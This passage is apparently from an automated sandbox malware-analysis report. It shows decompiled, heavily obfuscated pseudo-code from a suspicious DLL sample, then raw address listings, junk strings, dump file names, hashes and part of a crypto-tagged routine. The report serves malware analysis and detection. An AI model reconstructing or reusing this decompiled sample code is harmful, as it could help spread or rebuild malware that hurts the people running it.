								_t1259 = E00D3DE74();
								asm("sbb esi, esi");
								_t1469 = ( ~_t1259 & 0x060e21f6) + 0x19bf82;
								continue;
							}
							if(__eflags == 0) {
								_t1259 = E00D43EAA();
								asm("sbb esi, esi");
								_t1482 =  ~_t1259 & 0xf8bf9ea4;
								L21:
								_t1469 = _t1482 + 0x9642905;
								continue;
							}
							__eflags = _t1469 - 0x41f7676;
							if(__eflags == 0) {
								_t1259 = E00D3BDF9(__eflags);
								__eflags = _t1259;
								if(_t1259 == 0) {
									goto L113;
								}
								_t1469 = 0x22d34a3;
								continue;
							}
							__eflags = _t1469 - 0x4c22f24;
							if(_t1469 == 0x4c22f24) {
								_t1259 = E00D4D1BC( &_v152, _v628, _v572, _v280, _v444,  &_v160, _v636, E00D3A40E());
								_t1500 = _t1500 + 0x18;
								asm("sbb esi, esi");
								_t1469 = ( ~_t1259 & 0x068737c2) + 0x4c22f24;
								continue;
							}
							__eflags = _t1469 - 0x4d97dbc;
							if(_t1469 == 0x4d97dbc) {
								_t1259 = _v396;
								_t1469 = 0xcbac970;
								_v84 = _t1259;
								continue;
							}
							__eflags = _t1469 - 0x4f2172b;
							if(_t1469 != 0x4f2172b) {
								break;
							}
							_v24 = E00D4C37E();
							_t1259 = E00D4BD13(_t1279, _v460, _v340, _v468, _v184);
							_t1500 = _t1500 + 0xc;
							_v20 = _t1259;
							_t1469 = 0xba8c9c0;
							continue;
						}
						if(_t1505 == 0) {
							_t1259 = E00D50E63();
							__eflags = _t1259;
							if(_t1259 == 0) {
								goto L113;
							}
							_t1469 = 0xb3966a4;
							continue;
						}
						_t1506 = _t1469 - 0x1db8a88;
						if(_t1506 > 0) {
							__eflags = _t1469 - 0x223c7a9;
							if(_t1469 == 0x223c7a9) {
								_t1259 = E00D517BD(_v500, _v520, _v360);
								goto L113;
							}
							__eflags = _t1469 - 0x22d34a3;
							if(_t1469 == 0x22d34a3) {
								_t1259 = E00D52699();
								_t1469 = 0xa8d90c;
								continue;
							}
							__eflags = _t1469 - 0x282f66e;
							if(_t1469 == 0x282f66e) {
								_t1259 = E00D330E7();
								_v88 = _t1259;
								_t1469 = 0xc53db32;
								continue;
							}
							__eflags = _t1469 - 0x32638c6;
							if(_t1469 != 0x32638c6) {
								break;
							}
							_t1259 = E00D52B09(_v224, _v152, _v644, _v296);
							L29:
							_t1469 = 0x18cfb4a;
							continue;
						}
						if(_t1506 == 0) {
							_t1259 = E00D377A3( &_v152, _v412, _v580, _v192,  &_v100);
							_t1500 = _t1500 + 0xc;
							asm("sbb esi, esi");
							_t1469 = ( ~_t1259 & 0x019bf65e) + 0x32638c6;
							continue;
						}
						if(_t1469 == 0x19bf82) {
							_t1287 = E00D3670B();
							__eflags = _t1287;
							if(_t1287 == 0) {
								_t1259 = E00D4D111();
								asm("sbb esi, esi");
								_t1469 = ( ~_t1259 & 0x05b25150) + 0x8c2c3ca;
								continue;
							}
							_t1259 = E00D4D111();
							asm("sbb esi, esi");
							_t1482 =  ~_t1259 & 0xfc5df8f8;
							__eflags = _t1482;
							goto L21;
						}
						if(_t1469 == 0xa8d90c) {
							_t1259 = E00D42142();
							__eflags = _t1259;
							if(_t1259 == 0) {
								goto L113;
							}
							_t1469 = 0x39ddd07;
							continue;
						}
						if(_t1469 == 0x18cfb4a) {
							__eflags = _t1466 - _v332;
							if(_t1466 == _v332) {
								L16:
								_t1469 = _t1341;
								break;
							}
							_t1259 = E00D51028(_v180, _v496, E00D3A40E(), _t1466, _v660, _v320);
							_t1500 = _t1500 + 0x10;
							__eflags = _t1259 - _v548;
							if(_t1259 == _v548) {
								_t1259 = E00D44F74();
								goto L16;
							} else {
								_t1469 = 0x892c27a;
								continue;
							}
						}
						if(_t1469 != 0x19b3c55) {
							break;
						} else {
							_t1259 = E00D52B09(_v668, _v160, _v532, _v204);
							_t1469 = 0x32638c6;
							continue;
						}
						L54:
						__eflags = _t1469 - 0xba8c9c0;
						if(__eflags > 0) {
							__eflags = _t1469 - 0xe6d4a04;
							if(__eflags > 0) {
								__eflags = _t1469 - 0xe75151a;
								if(_t1469 == 0xe75151a) {
									E00D3A445();
									_t1469 = 0x8c2c3ca;
									break;
								}
								__eflags = _t1469 - 0xea72fdd;
								if(_t1469 == 0xea72fdd) {
									_t1259 = E00D48D3D();
									_t1469 = 0xee19950;
									continue;
								}
								__eflags = _t1469 - 0xee19950;
								if(__eflags == 0) {
									_v168 = E00D43D85(_v236, 0xd31248, __eflags,  &_v164, _v416);
									_v176 = E00D43D85(_v576, 0xd312a8, __eflags,  &_v172, _v228);
									_t1299 = E00D49A01( &_v176,  &_v168, _v552, _v560, _v568);
									asm("sbb esi, esi");
									_t1469 = ( ~_t1299 & 0x03fcb1a4) + 0x75265a3;
									E00D4FECB(_v176, _v392, _v544, _v400, _v408);
									_t1259 = E00D4FECB(_v168, _v368, _v376, _v384, _v536);
									_t1500 = _t1500 + 0x34;
								}
								break;
							}
							if(__eflags == 0) {
								_t1469 = 0x41f7676;
								continue;
							}
							__eflags = _t1469 - 0xc031f76;
							if(_t1469 == 0xc031f76) {
								_t1384 = _v616;
								_t1259 = E00D4E4E5(_v284,  &_v108, _v292, _v624);
								_t1500 = _t1500 + 0xc;
								__eflags = _t1259;
								if(_t1259 == 0) {
									_t1259 = _v144;
									__eflags = _t1259;
									if(_t1259 == 0) {
										_push(_t1384);
										_push(_t1384);
										_t1466 = E00D4CCA0(_v252, _v592);
										_t1500 = _t1500 + 0x10;
										_t1259 = _v144;
									}
									__eflags = _t1259 - 1;
									if(_t1259 == 1) {
										_push(_t1384);
										_push(_t1384);
										_t1259 = E00D4CCA0(_v424, _v432);
										_t1500 = _t1500 + 0x10;
										_t1466 = _t1259;
									}
								} else {
									_t1466 = _v608;
								}
								_t1341 = 0xc4fb15d;
								_t1469 = 0x92191f9;
								continue;
							}
							__eflags = _t1469 - 0xc4fb15d;
							if(_t1469 == 0xc4fb15d) {
								_t1259 = E00D35386(_v456,  &_v56, _v632);
								_pop(_t1384);
								_t1469 = 0x1db8a88;
								continue;
							}
							__eflags = _t1469 - 0xc53db32;
							if(_t1469 == 0xc53db32) {
								_t1259 = E00D4C387(_t1384);
								_v92 = _t1259;
								_t1469 = 0x4d97dbc;
								continue;
							}
							__eflags = _t1469 - 0xcbac970;
							if(_t1469 != 0xcbac970) {
								break;
							}
							_t1259 = _v316;
							_t1469 = 0xc4fb15d;
							_v44 = _t1259;
							continue;
						}
						if(__eflags == 0) {
							_t1259 = E00D3F8A0();
							_v12 = _t1259;
							_t1469 = 0x282f66e;
							continue;
						}
						__eflags = _t1469 - 0x9642905;
						if(__eflags > 0) {
							__eflags = _t1469 - 0xa51fadb;
							if(_t1469 == 0xa51fadb) {
								_t1259 = E00D4AD08();
								__eflags = _t1259;
								if(_t1259 == 0) {
									goto L113;
								}
								_t1469 = 0x7a1cd5a;
								continue;
							}
							__eflags = _t1469 - 0xb3966a4;
							if(_t1469 == 0xb3966a4) {
								_t1259 = E00D44A66();
								__eflags = _t1259;
								if(_t1259 == 0) {
									goto L113;
								}
								_t1469 = 0x8488c7d;
								continue;
							}
							__eflags = _t1469 - 0xb4966e6;
							if(_t1469 == 0xb4966e6) {
								_t1384 = _v508;
								_t1310 = E00D355FF(_t1384, _v504, _v420,  &_v160,  &_v144);
								_t1500 = _t1500 + 0xc;
								__eflags = _t1310;
								if(_t1310 != 0) {
									_t1259 = _v144;
									__eflags = _t1259 - 8;
									if(_t1259 != 8) {
										__eflags = _t1259;
										if(_t1259 == 0) {
											L79:
											_t1469 = 0xc031f76;
											continue;
										}
										__eflags = _t1259 - 1;
										if(_t1259 != 1) {
											L64:
											_t1469 = 0x19b3c55;
											continue;
										}
										goto L79;
									}
									_t1469 = 0x856f9ca;
									continue;
								}
								_push(_t1384);
								_push(_t1384);
								_t1259 = E00D4CCA0(_v324, _v480);
								_t1500 = _t1500 + 0x10;
								_t1466 = _t1259;
								_t1341 = 0xc4fb15d;
								goto L64;
							}
							__eflags = _t1469 - 0xb4f1747;
							if(_t1469 != 0xb4f1747) {
								break;
							}
							E00D50E63();
							_t1341 = 0x4f2172b;
							_push(_t1384);
							_push(_t1384);
							_t1259 = E00D4CCA0(_v380, _v428);
							_t1500 = _t1500 + 0x10;
							_t1466 = _t1259;
							goto L29;
						}
						if(__eflags == 0) {
							_t1259 = E00D4FBDE();
							_t1469 = 0xea72fdd;
							continue;
						}
						__eflags = _t1469 - 0x892c27a;
						if(_t1469 == 0x892c27a) {
							_t1259 = E00D3A417(_t1384);
							goto L113;
						}
						__eflags = _t1469 - 0x8c2c3ca;
						if(_t1469 == 0x8c2c3ca) {
							_t1259 = E00D4C5D5();
							_t1469 = 0x627e178;
							continue;
						}
						__eflags = _t1469 - 0x903542f;
						if(_t1469 == 0x903542f) {
							_t1259 = E00D3D14C();
							_t1469 = 0x6362904;
							continue;
						}
						__eflags = _t1469 - 0x92191f9;
						if(_t1469 != 0x92191f9) {
							break;
						}
						_t1259 = E00D4D111();
						__eflags = _t1259;
						if(_t1259 == 0) {
							_t1259 = E00D3C6B8();
						}
						goto L64;
					}
					__eflags = _t1469 - 0x75265a3;
				} while (_t1469 != 0x75265a3);
				goto L113;
			}

0x00d3863c
0x00d38642
0x00d3864f
0x00d3865a
0x00d38665
0x00d38670
0x00d3867b
0x00d38683
0x00d3868b
0x00d3869c
0x00d386a0
0x00d386a5
0x00d386ad
0x00d386b8
0x00d386c3
0x00d386ce
0x00d386e2
0x00d386e7
0x00d386f0
0x00d386fb
0x00d38706
0x00d38711
0x00d38718
0x00d38723
0x00d3872e
0x00d3873d
0x00d38742
0x00d3874b
0x00d38753
0x00d3875e
0x00d38769
0x00d38774
0x00d3877f
0x00d38792
0x00d38795
0x00d38798
0x00d3879f
0x00d387aa
0x00d387b5
0x00d387bd
0x00d387c8
0x00d387d3
0x00d387e6
0x00d387f8
0x00d387ff
0x00d3880a
0x00d38815
0x00d3881d
0x00d38828
0x00d38833
0x00d38849
0x00d38850
0x00d3885b
0x00d38866
0x00d38878
0x00d3887b
0x00d38884
0x00d3888f
0x00d3889a
0x00d388ac
0x00d388af
0x00d388b0
0x00d388b7
0x00d388c2
0x00d388d7
0x00d388de
0x00d388e6
0x00d388f1
0x00d388fc
0x00d38907
0x00d3890f
0x00d3891a
0x00d38922
0x00d3892a
0x00d3893a
0x00d3893e
0x00d38946
0x00d38951
0x00d38959
0x00d38964
0x00d3896f
0x00d3897a
0x00d38982
0x00d3898a
0x00d38995
0x00d389a0
0x00d389a8
0x00d389b3
0x00d389be
0x00d389c9
0x00d389d4
0x00d389ea
0x00d389f9
0x00d389fc
0x00d38a03
0x00d38a0e
0x00d38a1b
0x00d38a1f
0x00d38a2c
0x00d38a30
0x00d38a38
0x00d38a43
0x00d38a4b
0x00d38a5a
0x00d38a5d
0x00d38a64
0x00d38a6f
0x00d38a7a
0x00d38a85
0x00d38a90
0x00d38a9b
0x00d38aa6
0x00d38ab1
0x00d38abc
0x00d38ad2
0x00d38ad7
0x00d38ae6
0x00d38aed
0x00d38af8
0x00d38b00
0x00d38b05
0x00d38b15
0x00d38b19
0x00d38b21
0x00d38b29
0x00d38b33
0x00d38b37
0x00d38b3c
0x00d38b44
0x00d38b4f
0x00d38b57
0x00d38b62
0x00d38b6d
0x00d38b78
0x00d38b83
0x00d38b8e
0x00d38b99
0x00d38ba4
0x00d38baf
0x00d38bba
0x00d38bc5
0x00d38bcd
0x00d38bd5
0x00d38bdd
0x00d38be5
0x00d38bed
0x00d38bf8
0x00d38c00
0x00d38c07
0x00d38c12
0x00d38c1d
0x00d38c25
0x00d38c30
0x00d38c3b
0x00d38c46
0x00d38c51
0x00d38c5c
0x00d38c6f
0x00d38c76
0x00d38c81
0x00d38c89
0x00d38c96
0x00d38c9a
0x00d38c9f
0x00d38ca7
0x00d38cb2
0x00d38cbd
0x00d38cc8
0x00d38cd3
0x00d38ce6
0x00d38ced
0x00d38cf8
0x00d38d03
0x00d38d0e
0x00d38d22
0x00d38d29
0x00d38d34
0x00d38d3f
0x00d38d47
0x00d38d4f
0x00d38d54
0x00d38d5c
0x00d38d64
0x00d38d71
0x00d38d79
0x00d38d84
0x00d38d8f
0x00d38d9a
0x00d38da5
0x00d38dad
0x00d38db8
0x00d38dc3
0x00d38dce
0x00d38dd6
0x00d38dde
0x00d38de9
0x00d38dff
0x00d38e08
0x00d38e13
0x00d38e1e
0x00d38e29
0x00d38e34
0x00d38e3f
0x00d38e4a
0x00d38e55
0x00d38e60
0x00d38e6b
0x00d38e76
0x00d38e81
0x00d38e8c
0x00d38e97
0x00d38ea2
0x00d38ead
0x00d38eb8
0x00d38ec3
0x00d38ece
0x00d38ed9
0x00d38ee4
0x00d38eef
0x00d38efa
0x00d38f05
0x00d38f0d
0x00d38f18
0x00d38f20
0x00d38f2b
0x00d38f37
0x00d38f3c
0x00d38f42
0x00d38f4b
0x00d38f50
0x00d38f56
0x00d38f5e
0x00d38f66
0x00d38f6b
0x00d38f73
0x00d38f78
0x00d38f80
0x00d38f92
0x00d38f95
0x00d38f9c
0x00d38fa7
0x00d38faf
0x00d38fb4
0x00d38fb8
0x00d38fc0
0x00d38fc8
0x00d38fd0
0x00d38fdb
0x00d38fee
0x00d38ff3
0x00d38ffa
0x00d39005
0x00d39010
0x00d3901b
0x00d39026
0x00d39031
0x00d3903c
0x00d39047
0x00d39052
0x00d3905d
0x00d39068
0x00d39073
0x00d3907e
0x00d39089
0x00d39094
0x00d3909f
0x00d390aa
0x00d390b5
0x00d390c0
0x00d390c8
0x00d390d3
0x00d390db
0x00d390e0
0x00d390ef
0x00d390f2
0x00d390f6
0x00d390fe
0x00d39111
0x00d39118
0x00d39123
0x00d3912e
0x00d39139
0x00d39144
0x00d3915a
0x00d39161
0x00d3916c
0x00d39182
0x00d39189
0x00d39191
0x00d3919c
0x00d391a4
0x00d391ac
0x00d391b1
0x00d391b9
0x00d391c1
0x00d391cc
0x00d391d4
0x00d391dc
0x00d391e7
0x00d391ef
0x00d391f4
0x00d391f9
0x00d39201
0x00d39209
0x00d3921b
0x00d3921e
0x00d39225
0x00d39230
0x00d3923b
0x00d39243
0x00d3924b
0x00d39256
0x00d39261
0x00d3926e
0x00d39276
0x00d39281
0x00d39289
0x00d39298
0x00d3929b
0x00d392a4
0x00d392a8
0x00d392b0
0x00d392bb
0x00d392c6
0x00d392d1
0x00d392dc
0x00d392e7
0x00d392f2
0x00d392fd
0x00d3930a
0x00d3931b
0x00d3931f
0x00d39327
0x00d39332
0x00d3933a
0x00d39345
0x00d39350
0x00d3935b
0x00d39366
0x00d3936d
0x00d39378
0x00d3938e
0x00d39395
0x00d393a0
0x00d393ab
0x00d393b3
0x00d393bb
0x00d393c3
0x00d393c8
0x00d393d0
0x00d393db
0x00d393e3
0x00d393ee
0x00d393f9
0x00d3940c
0x00d3940d
0x00d39414
0x00d3941f
0x00d39427
0x00d3942f
0x00d39437
0x00d3943f
0x00d39447
0x00d3944f
0x00d39454
0x00d39459
0x00d3945e
0x00d39466
0x00d39471
0x00d3947a
0x00d39481
0x00d3948c
0x00d39497
0x00d394a2
0x00d394ad
0x00d394ba
0x00d394be
0x00d394cb
0x00d394d1
0x00d394d9
0x00d394e4
0x00d394ef
0x00d394fa
0x00d39505
0x00d3950d
0x00d39518
0x00d39520
0x00d39525
0x00d39529
0x00d3952e
0x00d39536
0x00d39541
0x00d3954c
0x00d39557
0x00d39562
0x00d39577
0x00d3957a
0x00d39581
0x00d3958c
0x00d39599
0x00d3959d
0x00d395aa
0x00d395ae
0x00d395b6
0x00d395c1
0x00d395c9
0x00d395d4
0x00d395df
0x00d395ea
0x00d395f5
0x00d39600
0x00d3960b
0x00d39616
0x00d39621
0x00d3962c
0x00d39637
0x00d39642
0x00d39658
0x00d3965f
0x00d3966a
0x00d39672
0x00d3967e
0x00d39683
0x00d39689
0x00d39691
0x00d39699
0x00d396a4
0x00d396af
0x00d396c1
0x00d396c4
0x00d396cb
0x00d396d6
0x00d396e1
0x00d396ec
0x00d396f7
0x00d3970a
0x00d39711
0x00d3971c
0x00d39724
0x00d3972c
0x00d39734
0x00d3973c
0x00d39744
0x00d39751
0x00d3975c
0x00d39767
0x00d3976f
0x00d39774
0x00d39779
0x00d39781
0x00d39789
0x00d39794
0x00d3979f
0x00d397aa
0x00d397c0
0x00d397c9
0x00d397d4
0x00d397df
0x00d397ea
0x00d397f2
0x00d397fd
0x00d39805
0x00d3980a
0x00d3980f
0x00d39817
0x00d3981f
0x00d3982a
0x00d39835
0x00d39840
0x00d3984b
0x00d39856
0x00d39861
0x00d3986c
0x00d39874
0x00d3987c
0x00d39887
0x00d39892
0x00d3989d
0x00d398a8
0x00d398b3
0x00d398be
0x00d398c9
0x00d398db
0x00d398e0
0x00d398e9
0x00d398f4
0x00d39907
0x00d3990a
0x00d39919
0x00d39920
0x00d3992b
0x00d39941
0x00d39948
0x00d39953
0x00d3995f
0x00d39962
0x00d39966
0x00d3996b
0x00d39973
0x00d3997b
0x00d39986
0x00d3998e
0x00d39996
0x00d399a1
0x00d399ac
0x00d399b7
0x00d399bf
0x00d399cc
0x00d399dc
0x00d399e7
0x00d399f2
0x00d399fd
0x00d39a05
0x00d39a10
0x00d39a24
0x00d39a29
0x00d39a30
0x00d39a37
0x00d39a42
0x00d39a4d
0x00d39a55
0x00d39a5d
0x00d39a65
0x00d39a6a
0x00d39a72
0x00d39a7d
0x00d39a88
0x00d39a93
0x00d39aa7
0x00d39aac
0x00d39ab3
0x00d39ac3
0x00d39aca
0x00d39aca
0x00d39ad5
0x00d39ad5
0x00d39ad5
0x00d39ad5
0x00d39adb
0x00d39adb
0x00d39ae1
0x00d39ae1
0x00d3a3f3
0x00d3a406
0x00d3a40d
0x00d3a40d
0x00d39ae7
0x00d39aed
0x00d39d2c
0x00d39d32
0x00d39e70
0x00d39e76
0x00d39f12
0x00d39f17
0x00d39ad5
0x00d39ad5
0x00d39ad5
0x00d39adb
0x00d39adb
0x00000000
0x00d39adb
0x00000000
0x00d39ad5
0x00d39e7c
0x00d39e82
0x00d39efc
0x00d39f01
0x00000000
0x00d39f01
0x00d39e84
0x00d39e8a
0x00d39ed0
0x00d39edc
0x00d39ee5
0x00d39eed
0x00000000
0x00d39eed
0x00d39e8c
0x00d39e92
0x00000000
0x00000000
0x00d39ea6
0x00d39eaf
0x00d39eb7
0x00000000
0x00d39eb7
0x00d39d38
0x00d39e5a
0x00d39e63
0x00d39e65
0x00d39c17
0x00d39c17
0x00000000
0x00d39c17
0x00d39d3e
0x00d39d44
0x00d39e3c
0x00d39e41
0x00d39e43
0x00000000
0x00000000
0x00d39e49
0x00000000
0x00d39e49
0x00d39d4a
0x00d39d50
0x00d39e0f
0x00d39e14
0x00d39e1b
0x00d39e23
0x00000000
0x00d39e23
0x00d39d52
0x00d39d58
0x00d39db7
0x00d39dbe
0x00d39dc3
0x00000000
0x00d39dc3
0x00d39d5a
0x00d39d60
0x00000000
0x00000000
0x00d39d82
0x00d39d9e
0x00d39da3
0x00d39da6
0x00d39dad
0x00000000
0x00d39dad
0x00d39af3
0x00d39d15
0x00d39d1a
0x00d39d1c
0x00000000
0x00000000
0x00d39d22
0x00000000
0x00d39d22
0x00d39af9
0x00d39aff
0x00d39c82
0x00d39c88
0x00d3a3dc
0x00000000
0x00d3a3e2
0x00d39c8e
0x00d39c94
0x00d39cf8
0x00d39cfd
0x00000000
0x00d39cfd
0x00d39c96
0x00d39c9c
0x00d39cdb
0x00d39ce0
0x00d39ce7
0x00000000
0x00d39ce7
0x00d39c9e
0x00d39ca4
0x00000000
0x00000000
0x00d39cc3
0x00d39cca
0x00d39cca
0x00000000
0x00d39cca
0x00d39b05
0x00d39c63
0x00d39c68
0x00d39c6f
0x00d39c77
0x00000000
0x00d39c77
0x00d39b11
0x00d39bf6
0x00d39bfb
0x00d39bfd
0x00d39c26
0x00d39c2f
0x00d39c37
0x00000000
0x00d39c37
0x00d39c06
0x00d39c0f
0x00d39c11
0x00d39c11
0x00000000
0x00d39c11
0x00d39b1d
0x00d39bd1
0x00d39bd6
0x00d39bd8
0x00000000
0x00000000
0x00d39bde
0x00000000
0x00d39bde
0x00d39b29
0x00d39b61
0x00d39b68
0x00d39bbc
0x00d39bbc
0x00000000
0x00d39bbc
0x00d39b95
0x00d39b9a
0x00d39b9d
0x00d39ba4
0x00d39bb7
0x00000000
0x00d39ba6
0x00d39ba6
0x00000000
0x00d39ba6
0x00d39ba4
0x00d39b31
0x00000000
0x00d39b37
0x00d39b50
0x00d39b57
0x00000000
0x00d39b57
0x00d39f21
0x00d39f21
0x00d39f27
0x00d3a137
0x00d3a13d
0x00d3a284
0x00d3a28a
0x00d3a3af
0x00d3a3b4
0x00000000
0x00d3a3b4
0x00d3a290
0x00d3a296
0x00d3a399
0x00d3a39e
0x00000000
0x00d3a39e
0x00d3a29c
0x00d3a2a2
0x00d3a2db
0x00d3a2fd
0x00d3a319
0x00d3a325
0x00d3a33b
0x00d3a356
0x00d3a381
0x00d3a386
0x00d3a386
0x00000000
0x00d3a2a2
0x00d3a143
0x00d3a27a
0x00000000
0x00d3a27a
0x00d3a149
0x00d3a14f
0x00d3a1dd
0x00d3a1e2
0x00d3a1e7
0x00d3a1ea
0x00d3a1ec
0x00d3a1f4
0x00d3a1fb
0x00d3a1fd
0x00d3a218
0x00d3a219
0x00d3a22a
0x00d3a22c
0x00d3a22f
0x00d3a22f
0x00d3a236
0x00d3a239
0x00d3a254
0x00d3a255
0x00d3a264
0x00d3a269
0x00d3a26c
0x00d3a26c
0x00d3a1ee
0x00d3a1ee
0x00d3a1ee
0x00d3a26e
0x00d3a270
0x00000000
0x00d3a270
0x00d3a151
0x00d3a153
0x00d3a1b4
0x00d3a1b9
0x00d3a1ba
0x00000000
0x00d3a1ba
0x00d3a155
0x00d3a15b
0x00d3a18c
0x00d3a191
0x00d3a198
0x00000000
0x00d3a198
0x00d3a15d
0x00d3a163
0x00000000
0x00000000
0x00d3a169
0x00d3a170
0x00d3a172
0x00000000
0x00d3a172
0x00d39f2d
0x00d3a121
0x00d3a126
0x00d3a12d
0x00000000
0x00d3a12d
0x00d39f33
0x00d39f39
0x00d39fd2
0x00d39fd8
0x00d3a106
0x00d3a10b
0x00d3a10d
0x00000000
0x00000000
0x00d3a113
0x00000000
0x00d3a113
0x00d39fde
0x00d39fe4
0x00d3a0e4
0x00d3a0e9
0x00d3a0eb
0x00000000
0x00000000
0x00d3a0f1
0x00000000
0x00d3a0f1
0x00d39fea
0x00d39ff0
0x00d3a066
0x00d3a06d
0x00d3a072
0x00d3a075
0x00d3a077
0x00d3a0b0
0x00d3a0b7
0x00d3a0ba
0x00d3a0c6
0x00d3a0c8
0x00d3a0d3
0x00d3a0d3
0x00000000
0x00d3a0d3
0x00d3a0ca
0x00d3a0cd
0x00d39f85
0x00d39f85
0x00000000
0x00d39f85
0x00000000
0x00d3a0cd
0x00d3a0bc
0x00000000
0x00d3a0bc
0x00d3a08f
0x00d3a090
0x00d3a09f
0x00d3a0a4
0x00d3a0a7
0x00d3a0a9
0x00000000
0x00d3a0a9
0x00d39ff2
0x00d39ff8
0x00000000
0x00000000
0x00d3a00c
0x00d3a015
0x00d3a029
0x00d3a02a
0x00d3a039
0x00d3a03e
0x00d3a041
0x00000000
0x00d3a041
0x00d39f3f
0x00d39fc3
0x00d39fc8
0x00000000
0x00d39fc8
0x00d39f41
0x00d39f47
0x00d3a401
0x00000000
0x00d3a401
0x00d39f4d
0x00d39f53
0x00d39fb0
0x00d39fb5
0x00000000
0x00d39fb5
0x00d39f55
0x00d39f5b
0x00d39f9a
0x00d39f9f
0x00000000
0x00d39f9f
0x00d39f5d
0x00d39f63
0x00000000
0x00000000
0x00d39f70
0x00d39f75
0x00d39f77
0x00d39f80
0x00d39f80
0x00000000
0x00d39f77
0x00d3a3b9
0x00d3a3b9
0x00000000

Strings

Uj`, xrefs: 00D394FA
C", xrefs: 00D3878A
Reo, xrefs: 00D392FD
Kx!, xrefs: 00D3997B
"{6, xrefs: 00D39471
s2O, xrefs: 00D39953
_1, xrefs: 00D39781
L}, xrefs: 00D39139
+>, xrefs: 00D39861
3}, xrefs: 00D39789
|V, xrefs: 00D38D29
Jvmw, xrefs: 00D38BDD
Q2N, xrefs: 00D38DC3
C", xrefs: 00D38CBD
/1, xrefs: 00D393BB
Tvs, xrefs: 00D38C30
LNe, xrefs: 00D391B9
C, xrefs: 00D39734
t, xrefs: 00D393E3
t0+, xrefs: 00D3879F
BO6, xrefs: 00D399BF
F, xrefs: 00D390E0
;w, xrefs: 00D38B19
S, xrefs: 00D3A185
W?n, xrefs: 00D38BF8
AW, xrefs: 00D39A55
08s%, xrefs: 00D3865A
XG, xrefs: 00D38FFA
E, xrefs: 00D38CF8
.MZ, xrefs: 00D396D6
jmI, xrefs: 00D38FAF

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: C$"{6$+>$.MZ$/1$08s%$3}$;w$AW$BO6$C"$C"$Jvmw$Kx!$LNe$Q2N$Reo$S$Tvs$Uj`$W?n$XG$_1$jmI$s2O$t0+$t$|V$E$F$L}
API String ID: 0-3734606162
Opcode ID: 9c6624dd709bd92848be769937ed7cb0265e4ed64f035bd256e01409eb9ee83f
Instruction ID: 70ecb7f5e1432b5c522f94d56328a0514b2dcc4aec5d5cde11473ab7107998e2
Opcode Fuzzy Hash: 9c6624dd709bd92848be769937ed7cb0265e4ed64f035bd256e01409eb9ee83f
Instruction Fuzzy Hash: B9E20F719093818BD3B8CF25C58AADBFBE1BB85314F10891DE5DE96260DBB08949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D3A871, Relevance: 24.4, Strings: 19, Instructions: 646
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00D3A871(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				signed int _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				unsigned int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				void* _t731;
				signed int _t732;
				signed int _t733;
				signed int _t743;
				signed int _t758;
				void* _t761;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t783;
				void* _t804;
				void* _t861;
				signed int _t865;
				void* _t867;
				signed int* _t868;
				void* _t874;

				_t868 =  &_v2932;
				_v2612 = _v2612 & 0x00000000;
				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0x74b642;
				_v2776 = 0xf885ca;
				_v2776 = _v2776 | 0xffdfd4be;
				_v2776 = _v2776 ^ 0xffffd5d7;
				_v2704 = 0xd88538;
				_v2704 = _v2704 + 0xebcf;
				_v2704 = _v2704 ^ 0x00c97107;
				_v2800 = 0xd52646;
				_v2800 = _v2800 ^ 0xe8dc52fe;
				_v2800 = _v2800 + 0xffffe935;
				_v2800 = _v2800 ^ 0xe804d8f6;
				_v2688 = 0xbafe67;
				_v2688 = _v2688 + 0x9481;
				_v2688 = _v2688 ^ 0x00b13019;
				_v2884 = 0x3d12e1;
				_v2884 = _v2884 << 1;
				_v2884 = _v2884 * 0x55;
				_t867 = __ecx;
				_t861 = 0xbf2cce3;
				_t763 = 0x73;
				_v2884 = _v2884 * 0xf;
				_v2884 = _v2884 ^ 0x605e8f7b;
				_v2696 = 0xf649d9;
				_v2696 = _v2696 / _t763;
				_v2696 = _v2696 ^ 0x000dd9df;
				_v2764 = 0x4a6242;
				_v2764 = _v2764 + 0xffff45cb;
				_v2764 = _v2764 >> 0xc;
				_v2764 = _v2764 ^ 0x000572e2;
				_v2784 = 0x8333a2;
